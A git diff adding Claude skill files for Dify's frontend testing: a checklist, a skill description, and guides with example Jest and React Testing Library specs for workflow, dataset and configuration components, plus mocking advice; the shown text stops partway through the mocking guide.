diff --git a/.claude/skills/frontend-testing/CHECKLIST.md b/.claude/skills/frontend-testing/CHECKLIST.md new file mode 100644 index 0000000000..b960067264 --- /dev/null +++ b/.claude/skills/frontend-testing/CHECKLIST.md @@ -0,0 +1,205 @@ +# Test Generation Checklist + +Use this checklist when generating or reviewing tests for Dify frontend components. + +## Pre-Generation + +- [ ] Read the component source code completely +- [ ] Identify component type (component, hook, utility, page) +- [ ] Run `pnpm analyze-component ` if available +- [ ] Note complexity score and features detected +- [ ] Check for existing tests in the same directory +- [ ] **Identify ALL files in the directory** that need testing (not just index) + +## Testing Strategy + +### ⚠️ Incremental Workflow (CRITICAL for Multi-File) + +- [ ] **NEVER generate all tests at once** - process one file at a time +- [ ] Order files by complexity: utilities → hooks → simple → complex → integration +- [ ] Create a todo list to track progress before starting +- [ ] For EACH file: write → run test → verify pass → then next +- [ ] **DO NOT proceed** to next file until current one passes + +### Path-Level Coverage + +- [ ] **Test ALL files** in the assigned directory/path +- [ ] List all components, hooks, utilities that need coverage +- [ ] Decide: single spec file (integration) or multiple spec files (unit) + +### Complexity Assessment + +- [ ] Run `pnpm analyze-component ` for complexity score +- [ ] **Complexity > 50**: Consider refactoring before testing +- [ ] **500+ lines**: Consider splitting before testing +- [ ] **30-50 complexity**: Use multiple describe blocks, organized structure + +### Integration vs Mocking + +- [ ] **DO NOT mock base components** (`Loading`, `Button`, `Tooltip`, etc.) 
+- [ ] Import real project components instead of mocking +- [ ] Only mock: API calls, complex context providers, third-party libs with side effects +- [ ] Prefer integration testing when using single spec file + +## Required Test Sections + +### All Components MUST Have + +- [ ] **Rendering tests** - Component renders without crashing +- [ ] **Props tests** - Required props, optional props, default values +- [ ] **Edge cases** - null, undefined, empty values, boundaries + +### Conditional Sections (Add When Feature Present) + +| Feature | Add Tests For | +|---------|---------------| +| `useState` | Initial state, transitions, cleanup | +| `useEffect` | Execution, dependencies, cleanup | +| Event handlers | onClick, onChange, onSubmit, keyboard | +| API calls | Loading, success, error states | +| Routing | Navigation, params, query strings | +| `useCallback`/`useMemo` | Referential equality | +| Context | Provider values, consumer behavior | +| Forms | Validation, submission, error display | + +## Code Quality Checklist + +### Structure + +- [ ] Uses `describe` blocks to group related tests +- [ ] Test names follow `should when ` pattern +- [ ] AAA pattern (Arrange-Act-Assert) is clear +- [ ] Comments explain complex test scenarios + +### Mocks + +- [ ] **DO NOT mock base components** (`@/app/components/base/*`) +- [ ] `jest.clearAllMocks()` in `beforeEach` (not `afterEach`) +- [ ] Shared mock state reset in `beforeEach` +- [ ] i18n uses shared mock (auto-loaded); only override locally for custom translations +- [ ] Router mocks match actual Next.js API +- [ ] Mocks reflect actual component conditional behavior +- [ ] Only mock: API services, complex context providers, third-party libs + +### Queries + +- [ ] Prefer semantic queries (`getByRole`, `getByLabelText`) +- [ ] Use `queryBy*` for absence assertions +- [ ] Use `findBy*` for async elements +- [ ] `getByTestId` only as last resort + +### Async + +- [ ] All async tests use `async/await` +- [ ] `waitFor` wraps async assertions +- [ ] Fake timers properly setup/teardown +- [ ] No floating promises + +### TypeScript + +- [ ] No `any` types without justification +- [ ] Mock data uses actual types from source +- [ ] Factory functions have proper return types + +## Coverage Goals (Per File) + +For the current file being tested: + +- [ ] 100% function coverage +- [ ] 100% statement coverage +- [ ] >95% branch coverage +- [ ] >95% line coverage + +## Post-Generation (Per File) + +**Run these checks after EACH test file, not just at the end:** + +- [ ] Run `pnpm test -- path/to/file.spec.tsx` - **MUST PASS before next file** +- [ ] Fix any failures immediately +- [ ] Mark file as complete in todo list +- [ ] Only then proceed to next file + +### After All Files Complete + +- [ ] Run full directory test: `pnpm test -- path/to/directory/` +- [ ] Check coverage report: `pnpm test -- --coverage` +- [ ] Run `pnpm lint:fix` on all test files +- [ ] Run `pnpm type-check:tsgo` + +## Common Issues to Watch + +### False Positives + +```typescript +// ❌ Mock doesn't match actual behavior +jest.mock('./Component', () => () =>
<div>Mocked</div>
) + +// ✅ Mock matches actual conditional logic +jest.mock('./Component', () => ({ isOpen }: any) => + isOpen ?
<div>Content</div>
: null +) +``` + +### State Leakage + +```typescript +// ❌ Shared state not reset +let mockState = false +jest.mock('./useHook', () => () => mockState) + +// ✅ Reset in beforeEach +beforeEach(() => { + mockState = false +}) +``` + +### Async Race Conditions + +```typescript +// ❌ Not awaited +it('loads data', () => { + render() + expect(screen.getByText('Data')).toBeInTheDocument() +}) + +// ✅ Properly awaited +it('loads data', async () => { + render() + await waitFor(() => { + expect(screen.getByText('Data')).toBeInTheDocument() + }) +}) +``` + +### Missing Edge Cases + +Always test these scenarios: + +- `null` / `undefined` inputs +- Empty strings / arrays / objects +- Boundary values (0, -1, MAX_INT) +- Error states +- Loading states +- Disabled states + +## Quick Commands + +```bash +# Run specific test +pnpm test -- path/to/file.spec.tsx + +# Run with coverage +pnpm test -- --coverage path/to/file.spec.tsx + +# Watch mode +pnpm test -- --watch path/to/file.spec.tsx + +# Update snapshots (use sparingly) +pnpm test -- -u path/to/file.spec.tsx + +# Analyze component +pnpm analyze-component path/to/component.tsx + +# Review existing test +pnpm analyze-component path/to/component.tsx --review +``` diff --git a/.claude/skills/frontend-testing/SKILL.md b/.claude/skills/frontend-testing/SKILL.md new file mode 100644 index 0000000000..06cb672141 --- /dev/null +++ b/.claude/skills/frontend-testing/SKILL.md @@ -0,0 +1,321 @@ +--- +name: Dify Frontend Testing +description: Generate Jest + React Testing Library tests for Dify frontend components, hooks, and utilities. Triggers on testing, spec files, coverage, Jest, RTL, unit tests, integration tests, or write/review test requests. +--- + +# Dify Frontend Testing Skill + +This skill enables Claude to generate high-quality, comprehensive frontend tests for the Dify project following established conventions and best practices. + +> **⚠️ Authoritative Source**: This skill is derived from `web/testing/testing.md`. When in doubt, always refer to that document as the canonical specification. 
+ +## When to Apply This Skill + +Apply this skill when the user: + +- Asks to **write tests** for a component, hook, or utility +- Asks to **review existing tests** for completeness +- Mentions **Jest**, **React Testing Library**, **RTL**, or **spec files** +- Requests **test coverage** improvement +- Uses `pnpm analyze-component` output as context +- Mentions **testing**, **unit tests**, or **integration tests** for frontend code +- Wants to understand **testing patterns** in the Dify codebase + +**Do NOT apply** when: + +- User is asking about backend/API tests (Python/pytest) +- User is asking about E2E tests (Playwright/Cypress) +- User is only asking conceptual questions without code context + +## Quick Reference + +### Tech Stack + +| Tool | Version | Purpose | +|------|---------|---------| +| Jest | 29.7 | Test runner | +| React Testing Library | 16.0 | Component testing | +| happy-dom | - | Test environment | +| nock | 14.0 | HTTP mocking | +| TypeScript | 5.x | Type safety | + +### Key Commands + +```bash +# Run all tests +pnpm test + +# Watch mode +pnpm test -- --watch + +# Run specific file +pnpm test -- path/to/file.spec.tsx + +# Generate coverage report +pnpm test -- --coverage + +# Analyze component complexity +pnpm analyze-component + +# Review existing test +pnpm analyze-component --review +``` + +### File Naming + +- Test files: `ComponentName.spec.tsx` (same directory as component) +- Integration tests: `web/__tests__/` directory + +## Test Structure Template + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import Component from './index' + +// ✅ Import real project components (DO NOT mock these) +// import Loading from '@/app/components/base/loading' +// import { ChildComponent } from './child-component' + +// ✅ Mock external dependencies only +jest.mock('@/service/api') +jest.mock('next/navigation', () => ({ + useRouter: () => ({ push: jest.fn() }), + usePathname: () => '/test', +})) + +// Shared state for mocks (if needed) +let mockSharedState = false + +describe('ComponentName', () => { + beforeEach(() => { + jest.clearAllMocks() // ✅ Reset mocks BEFORE each test + mockSharedState = false // ✅ Reset shared state + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange + const props = { title: 'Test' } + + // Act + render() + + // Assert + expect(screen.getByText('Test')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should apply custom className', () => { + render() + expect(screen.getByRole('button')).toHaveClass('custom') + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should handle click events', () => { + const handleClick = jest.fn() + render() + + fireEvent.click(screen.getByRole('button')) + + expect(handleClick).toHaveBeenCalledTimes(1) + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle null data', () => { + render() + expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle empty array', () => { + render() + expect(screen.getByText(/empty/i)).toBeInTheDocument() + }) + }) +}) +``` + +## Testing Workflow (CRITICAL) + +### ⚠️ Incremental Approach Required + +**NEVER generate all test files at once.** For complex components or multi-file directories: + +1. **Analyze & Plan**: List all files, order by complexity (simple → complex) +1. 
**Process ONE at a time**: Write test → Run test → Fix if needed → Next +1. **Verify before proceeding**: Do NOT continue to next file until current passes + +``` +For each file: + ┌────────────────────────────────────────┐ + │ 1. Write test │ + │ 2. Run: pnpm test -- .spec.tsx │ + │ 3. PASS? → Mark complete, next file │ + │ FAIL? → Fix first, then continue │ + └────────────────────────────────────────┘ +``` + +### Complexity-Based Order + +Process in this order for multi-file testing: + +1. 🟢 Utility functions (simplest) +1. 🟢 Custom hooks +1. 🟡 Simple components (presentational) +1. 🟡 Medium components (state, effects) +1. 🔴 Complex components (API, routing) +1. 🔴 Integration tests (index files - last) + +### When to Refactor First + +- **Complexity > 50**: Break into smaller pieces before testing +- **500+ lines**: Consider splitting before testing +- **Many dependencies**: Extract logic into hooks first + +> 📖 See `guides/workflow.md` for complete workflow details and todo list format. + +## Testing Strategy + +### Path-Level Testing (Directory Testing) + +When assigned to test a directory/path, test **ALL content** within that path: + +- Test all components, hooks, utilities in the directory (not just `index` file) +- Use incremental approach: one file at a time, verify each before proceeding +- Goal: 100% coverage of ALL files in the directory + +### Integration Testing First + +**Prefer integration testing** when writing tests for a directory: + +- ✅ **Import real project components** directly (including base components and siblings) +- ✅ **Only mock**: API services (`@/service/*`), `next/navigation`, complex context providers +- ❌ **DO NOT mock** base components (`@/app/components/base/*`) +- ❌ **DO NOT mock** sibling/child components in the same directory + +> See [Test Structure Template](#test-structure-template) for correct import/mock patterns. + +## Core Principles + +### 1. AAA Pattern (Arrange-Act-Assert) + +Every test should clearly separate: + +- **Arrange**: Setup test data and render component +- **Act**: Perform user actions +- **Assert**: Verify expected outcomes + +### 2. Black-Box Testing + +- Test observable behavior, not implementation details +- Use semantic queries (getByRole, getByLabelText) +- Avoid testing internal state directly +- **Prefer pattern matching over hardcoded strings** in assertions: + +```typescript +// ❌ Avoid: hardcoded text assertions +expect(screen.getByText('Loading...')).toBeInTheDocument() + +// ✅ Better: role-based queries +expect(screen.getByRole('status')).toBeInTheDocument() + +// ✅ Better: pattern matching +expect(screen.getByText(/loading/i)).toBeInTheDocument() +``` + +### 3. 
Single Behavior Per Test + +Each test verifies ONE user-observable behavior: + +```typescript +// ✅ Good: One behavior +it('should disable button when loading', () => { + render( + + + ) + + // Focus should cycle within modal + await user.tab() + expect(screen.getByText('First')).toHaveFocus() + + await user.tab() + expect(screen.getByText('Second')).toHaveFocus() + + await user.tab() + expect(screen.getByText('First')).toHaveFocus() // Cycles back + }) +}) +``` + +## Form Testing + +```typescript +describe('LoginForm', () => { + it('should submit valid form', async () => { + const user = userEvent.setup() + const onSubmit = jest.fn() + + render() + + await user.type(screen.getByLabelText(/email/i), 'test@example.com') + await user.type(screen.getByLabelText(/password/i), 'password123') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(onSubmit).toHaveBeenCalledWith({ + email: 'test@example.com', + password: 'password123', + }) + }) + + it('should show validation errors', async () => { + const user = userEvent.setup() + + render() + + // Submit empty form + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByText(/email is required/i)).toBeInTheDocument() + expect(screen.getByText(/password is required/i)).toBeInTheDocument() + }) + + it('should validate email format', async () => { + const user = userEvent.setup() + + render() + + await user.type(screen.getByLabelText(/email/i), 'invalid-email') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByText(/invalid email/i)).toBeInTheDocument() + }) + + it('should disable submit button while submitting', async () => { + const user = userEvent.setup() + const onSubmit = jest.fn(() => new Promise(resolve => setTimeout(resolve, 100))) + + render() + + await user.type(screen.getByLabelText(/email/i), 'test@example.com') + await user.type(screen.getByLabelText(/password/i), 'password123') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByRole('button', { name: /signing in/i })).toBeDisabled() + + await waitFor(() => { + expect(screen.getByRole('button', { name: /sign in/i })).toBeEnabled() + }) + }) +}) +``` + +## Data-Driven Tests with test.each + +```typescript +describe('StatusBadge', () => { + test.each([ + ['success', 'bg-green-500'], + ['warning', 'bg-yellow-500'], + ['error', 'bg-red-500'], + ['info', 'bg-blue-500'], + ])('should apply correct class for %s status', (status, expectedClass) => { + render() + + expect(screen.getByTestId('status-badge')).toHaveClass(expectedClass) + }) + + test.each([ + { input: null, expected: 'Unknown' }, + { input: undefined, expected: 'Unknown' }, + { input: '', expected: 'Unknown' }, + { input: 'invalid', expected: 'Unknown' }, + ])('should show "Unknown" for invalid input: $input', ({ input, expected }) => { + render() + + expect(screen.getByText(expected)).toBeInTheDocument() + }) +}) +``` + +## Debugging Tips + +```typescript +// Print entire DOM +screen.debug() + +// Print specific element +screen.debug(screen.getByRole('button')) + +// Log testing playground URL +screen.logTestingPlaygroundURL() + +// Pretty print DOM +import { prettyDOM } from '@testing-library/react' +console.log(prettyDOM(screen.getByRole('dialog'))) + +// Check available roles +import { getRoles } from '@testing-library/react' +console.log(getRoles(container)) +``` + +## Common Mistakes to Avoid + +### ❌ Don't Use Implementation Details + +```typescript +// Bad - testing 
implementation +expect(component.state.isOpen).toBe(true) +expect(wrapper.find('.internal-class').length).toBe(1) + +// Good - testing behavior +expect(screen.getByRole('dialog')).toBeInTheDocument() +``` + +### ❌ Don't Forget Cleanup + +```typescript +// Bad - may leak state between tests +it('test 1', () => { + render() +}) + +// Good - cleanup is automatic with RTL, but reset mocks +beforeEach(() => { + jest.clearAllMocks() +}) +``` + +### ❌ Don't Use Exact String Matching (Prefer Black-Box Assertions) + +```typescript +// ❌ Bad - hardcoded strings are brittle +expect(screen.getByText('Submit Form')).toBeInTheDocument() +expect(screen.getByText('Loading...')).toBeInTheDocument() + +// ✅ Good - role-based queries (most semantic) +expect(screen.getByRole('button', { name: /submit/i })).toBeInTheDocument() +expect(screen.getByRole('status')).toBeInTheDocument() + +// ✅ Good - pattern matching (flexible) +expect(screen.getByText(/submit/i)).toBeInTheDocument() +expect(screen.getByText(/loading/i)).toBeInTheDocument() + +// ✅ Good - test behavior, not exact UI text +expect(screen.getByRole('button')).toBeDisabled() +expect(screen.getByRole('alert')).toBeInTheDocument() +``` + +**Why prefer black-box assertions?** + +- Text content may change (i18n, copy updates) +- Role-based queries test accessibility +- Pattern matching is resilient to minor changes +- Tests focus on behavior, not implementation details + +### ❌ Don't Assert on Absence Without Query + +```typescript +// Bad - throws if not found +expect(screen.getByText('Error')).not.toBeInTheDocument() // Error! + +// Good - use queryBy for absence assertions +expect(screen.queryByText('Error')).not.toBeInTheDocument() +``` diff --git a/.claude/skills/frontend-testing/guides/domain-components.md b/.claude/skills/frontend-testing/guides/domain-components.md new file mode 100644 index 0000000000..ed2cc6eb8a --- /dev/null +++ b/.claude/skills/frontend-testing/guides/domain-components.md @@ -0,0 +1,523 @@ +# Domain-Specific Component Testing + +This guide covers testing patterns for Dify's domain-specific components. + +## Workflow Components (`workflow/`) + +Workflow components handle node configuration, data flow, and graph operations. + +### Key Test Areas + +1. **Node Configuration** +1. **Data Validation** +1. **Variable Passing** +1. **Edge Connections** +1. 
**Error Handling** + +### Example: Node Configuration Panel + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import NodeConfigPanel from './node-config-panel' +import { createMockNode, createMockWorkflowContext } from '@/__mocks__/workflow' + +// Mock workflow context +jest.mock('@/app/components/workflow/hooks', () => ({ + useWorkflowStore: () => mockWorkflowStore, + useNodesInteractions: () => mockNodesInteractions, +})) + +let mockWorkflowStore = { + nodes: [], + edges: [], + updateNode: jest.fn(), +} + +let mockNodesInteractions = { + handleNodeSelect: jest.fn(), + handleNodeDelete: jest.fn(), +} + +describe('NodeConfigPanel', () => { + beforeEach(() => { + jest.clearAllMocks() + mockWorkflowStore = { + nodes: [], + edges: [], + updateNode: jest.fn(), + } + }) + + describe('Node Configuration', () => { + it('should render node type selector', () => { + const node = createMockNode({ type: 'llm' }) + render() + + expect(screen.getByLabelText(/model/i)).toBeInTheDocument() + }) + + it('should update node config on change', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'llm' }) + + render() + + await user.selectOptions(screen.getByLabelText(/model/i), 'gpt-4') + + expect(mockWorkflowStore.updateNode).toHaveBeenCalledWith( + node.id, + expect.objectContaining({ model: 'gpt-4' }) + ) + }) + }) + + describe('Data Validation', () => { + it('should show error for invalid input', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'code' }) + + render() + + // Enter invalid code + const codeInput = screen.getByLabelText(/code/i) + await user.clear(codeInput) + await user.type(codeInput, 'invalid syntax {{{') + + await waitFor(() => { + expect(screen.getByText(/syntax error/i)).toBeInTheDocument() + }) + }) + + it('should validate required fields', async () => { + const node = createMockNode({ type: 'http', data: { url: '' } }) + + render() + + fireEvent.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(screen.getByText(/url is required/i)).toBeInTheDocument() + }) + }) + }) + + describe('Variable Passing', () => { + it('should display available variables from upstream nodes', () => { + const upstreamNode = createMockNode({ + id: 'node-1', + type: 'start', + data: { outputs: [{ name: 'user_input', type: 'string' }] }, + }) + const currentNode = createMockNode({ + id: 'node-2', + type: 'llm', + }) + + mockWorkflowStore.nodes = [upstreamNode, currentNode] + mockWorkflowStore.edges = [{ source: 'node-1', target: 'node-2' }] + + render() + + // Variable selector should show upstream variables + fireEvent.click(screen.getByRole('button', { name: /add variable/i })) + + expect(screen.getByText('user_input')).toBeInTheDocument() + }) + + it('should insert variable into prompt template', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'llm' }) + + render() + + // Click variable button + await user.click(screen.getByRole('button', { name: /insert variable/i })) + await user.click(screen.getByText('user_input')) + + const promptInput = screen.getByLabelText(/prompt/i) + expect(promptInput).toHaveValue(expect.stringContaining('{{user_input}}')) + }) + }) +}) +``` + +## Dataset Components (`dataset/`) + +Dataset components handle file uploads, data display, and search/filter operations. + +### Key Test Areas + +1. **File Upload** +1. **File Type Validation** +1. 
**Pagination** +1. **Search & Filtering** +1. **Data Format Handling** + +### Example: Document Uploader + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DocumentUploader from './document-uploader' + +jest.mock('@/service/datasets', () => ({ + uploadDocument: jest.fn(), + parseDocument: jest.fn(), +})) + +import * as datasetService from '@/service/datasets' +const mockedService = datasetService as jest.Mocked + +describe('DocumentUploader', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('File Upload', () => { + it('should accept valid file types', async () => { + const user = userEvent.setup() + const onUpload = jest.fn() + mockedService.uploadDocument.mockResolvedValue({ id: 'doc-1' }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + const input = screen.getByLabelText(/upload/i) + + await user.upload(input, file) + + await waitFor(() => { + expect(mockedService.uploadDocument).toHaveBeenCalledWith( + expect.any(FormData) + ) + }) + }) + + it('should reject invalid file types', async () => { + const user = userEvent.setup() + + render() + + const file = new File(['content'], 'test.exe', { type: 'application/x-msdownload' }) + const input = screen.getByLabelText(/upload/i) + + await user.upload(input, file) + + expect(screen.getByText(/unsupported file type/i)).toBeInTheDocument() + expect(mockedService.uploadDocument).not.toHaveBeenCalled() + }) + + it('should show upload progress', async () => { + const user = userEvent.setup() + + // Mock upload with progress + mockedService.uploadDocument.mockImplementation(() => { + return new Promise((resolve) => { + setTimeout(() => resolve({ id: 'doc-1' }), 100) + }) + }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + expect(screen.getByRole('progressbar')).toBeInTheDocument() + + await waitFor(() => { + expect(screen.queryByRole('progressbar')).not.toBeInTheDocument() + }) + }) + }) + + describe('Error Handling', () => { + it('should handle upload failure', async () => { + const user = userEvent.setup() + mockedService.uploadDocument.mockRejectedValue(new Error('Upload failed')) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + await waitFor(() => { + expect(screen.getByText(/upload failed/i)).toBeInTheDocument() + }) + }) + + it('should allow retry after failure', async () => { + const user = userEvent.setup() + mockedService.uploadDocument + .mockRejectedValueOnce(new Error('Network error')) + .mockResolvedValueOnce({ id: 'doc-1' }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + await waitFor(() => { + expect(screen.getByRole('button', { name: /retry/i })).toBeInTheDocument() + }) + + await user.click(screen.getByRole('button', { name: /retry/i })) + + await waitFor(() => { + expect(screen.getByText(/uploaded successfully/i)).toBeInTheDocument() + }) + }) + }) +}) +``` + +### Example: Document List with Pagination + +```typescript +describe('DocumentList', () => { + describe('Pagination', () => { + it('should load first page on mount', async () => { + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '1', name: 'Doc 1' }], + total: 50, + 
page: 1, + pageSize: 10, + }) + + render() + + await waitFor(() => { + expect(screen.getByText('Doc 1')).toBeInTheDocument() + }) + + expect(mockedService.getDocuments).toHaveBeenCalledWith('ds-1', { page: 1 }) + }) + + it('should navigate to next page', async () => { + const user = userEvent.setup() + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '1', name: 'Doc 1' }], + total: 50, + page: 1, + pageSize: 10, + }) + + render() + + await waitFor(() => { + expect(screen.getByText('Doc 1')).toBeInTheDocument() + }) + + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '11', name: 'Doc 11' }], + total: 50, + page: 2, + pageSize: 10, + }) + + await user.click(screen.getByRole('button', { name: /next/i })) + + await waitFor(() => { + expect(screen.getByText('Doc 11')).toBeInTheDocument() + }) + }) + }) + + describe('Search & Filtering', () => { + it('should filter by search query', async () => { + const user = userEvent.setup() + jest.useFakeTimers() + + render() + + await user.type(screen.getByPlaceholderText(/search/i), 'test query') + + // Debounce + jest.advanceTimersByTime(300) + + await waitFor(() => { + expect(mockedService.getDocuments).toHaveBeenCalledWith( + 'ds-1', + expect.objectContaining({ search: 'test query' }) + ) + }) + + jest.useRealTimers() + }) + }) +}) +``` + +## Configuration Components (`app/configuration/`, `config/`) + +Configuration components handle forms, validation, and data persistence. + +### Key Test Areas + +1. **Form Validation** +1. **Save/Reset** +1. **Required vs Optional Fields** +1. **Configuration Persistence** +1. **Error Feedback** + +### Example: App Configuration Form + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import AppConfigForm from './app-config-form' + +jest.mock('@/service/apps', () => ({ + updateAppConfig: jest.fn(), + getAppConfig: jest.fn(), +})) + +import * as appService from '@/service/apps' +const mockedService = appService as jest.Mocked + +describe('AppConfigForm', () => { + const defaultConfig = { + name: 'My App', + description: '', + icon: 'default', + openingStatement: '', + } + + beforeEach(() => { + jest.clearAllMocks() + mockedService.getAppConfig.mockResolvedValue(defaultConfig) + }) + + describe('Form Validation', () => { + it('should require app name', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Clear name field + await user.clear(screen.getByLabelText(/name/i)) + await user.click(screen.getByRole('button', { name: /save/i })) + + expect(screen.getByText(/name is required/i)).toBeInTheDocument() + expect(mockedService.updateAppConfig).not.toHaveBeenCalled() + }) + + it('should validate name length', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toBeInTheDocument() + }) + + // Enter very long name + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'a'.repeat(101)) + + expect(screen.getByText(/name must be less than 100 characters/i)).toBeInTheDocument() + }) + + it('should allow empty optional fields', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockResolvedValue({ success: true }) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Leave description empty 
(optional) + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(mockedService.updateAppConfig).toHaveBeenCalled() + }) + }) + }) + + describe('Save/Reset Functionality', () => { + it('should save configuration', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockResolvedValue({ success: true }) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'Updated App') + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(mockedService.updateAppConfig).toHaveBeenCalledWith( + 'app-1', + expect.objectContaining({ name: 'Updated App' }) + ) + }) + + expect(screen.getByText(/saved successfully/i)).toBeInTheDocument() + }) + + it('should reset to default values', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Make changes + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'Changed Name') + + // Reset + await user.click(screen.getByRole('button', { name: /reset/i })) + + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + it('should show unsaved changes warning', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Make changes + await user.type(screen.getByLabelText(/name/i), ' Updated') + + expect(screen.getByText(/unsaved changes/i)).toBeInTheDocument() + }) + }) + + describe('Error Handling', () => { + it('should show error on save failure', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockRejectedValue(new Error('Server error')) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(screen.getByText(/failed to save/i)).toBeInTheDocument() + }) + }) + }) +}) +``` diff --git a/.claude/skills/frontend-testing/guides/mocking.md b/.claude/skills/frontend-testing/guides/mocking.md new file mode 100644 index 0000000000..bf0bd79690 --- /dev/null +++ b/.claude/skills/frontend-testing/guides/mocking.md @@ -0,0 +1,363 @@ +# Mocking Guide for Dify Frontend Tests + +## ⚠️ Important: What NOT to Mock + +### DO NOT Mock Base Components + +**Never mock components from `@/app/components/base/`** such as: + +- `Loading`, `Spinner` +- `Button`, `Input`, `Select` +- `Tooltip`, `Modal`, `Dropdown` +- `Icon`, `Badge`, `Tag` + +**Why?** + +- Base components will have their own dedicated tests +- Mocking them creates false positives (tests pass but real integration fails) +- Using real components tests actual integration behavior + +```typescript +// ❌ WRONG: Don't mock base components +jest.mock('@/app/components/base/loading', () => () =>
<div>Loading</div>
) +jest.mock('@/app/components/base/button', () => ({ children }: any) => ) + +// ✅ CORRECT: Import and use real base components +import Loading from '@/app/components/base/loading' +import Button from '@/app/components/base/button' +// They will render normally in tests +``` + +### What TO Mock + +Only mock these categories: + +1. **API services** (`@/service/*`) - Network calls +1. **Complex context providers** - When setup is too difficult +1. **Third-party libraries with side effects** - `next/navigation`, external SDKs +1. **i18n** - Always mock to return keys + +## Mock Placement + +| Location | Purpose | +|----------|---------| +| `web/__mocks__/` | Reusable mocks shared across multiple test files | +| Test file | Test-specific mocks, inline with `jest.mock()` | + +## Essential Mocks + +### 1. i18n (Auto-loaded via Shared Mock) + +A shared mock is available at `web/__mocks__/react-i18next.ts` and is auto-loaded by Jest. +**No explicit mock needed** for most tests - it returns translation keys as-is. + +For tests requiring custom translations, override the mock: + +```typescript +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'my.custom.key': 'Custom translation', + } + return translations[key] || key + }, + }), +})) +``` + +### 2. Next.js Router + +```typescript +const mockPush = jest.fn() +const mockReplace = jest.fn() + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + replace: mockReplace, + back: jest.fn(), + prefetch: jest.fn(), + }), + usePathname: () => '/current-path', + useSearchParams: () => new URLSearchParams('?key=value'), +})) + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should navigate on click', () => { + render() + fireEvent.click(screen.getByRole('button')) + expect(mockPush).toHaveBeenCalledWith('/expected-path') + }) +}) +``` + +### 3. Portal Components (with Shared State) + +```typescript +// ⚠️ Important: Use shared state for components that depend on each other +let mockPortalOpenState = false + +jest.mock('@/app/components/base/portal-to-follow-elem', () => ({ + PortalToFollowElem: ({ children, open, ...props }: any) => { + mockPortalOpenState = open || false // Update shared state + return
<div {...props}>{children}</div>
+ }, + PortalToFollowElemContent: ({ children }: any) => { + // ✅ Matches actual: returns null when portal is closed + if (!mockPortalOpenState) return null + return
<div>{children}</div>
+ }, + PortalToFollowElemTrigger: ({ children }: any) => ( +
<div>{children}</div>
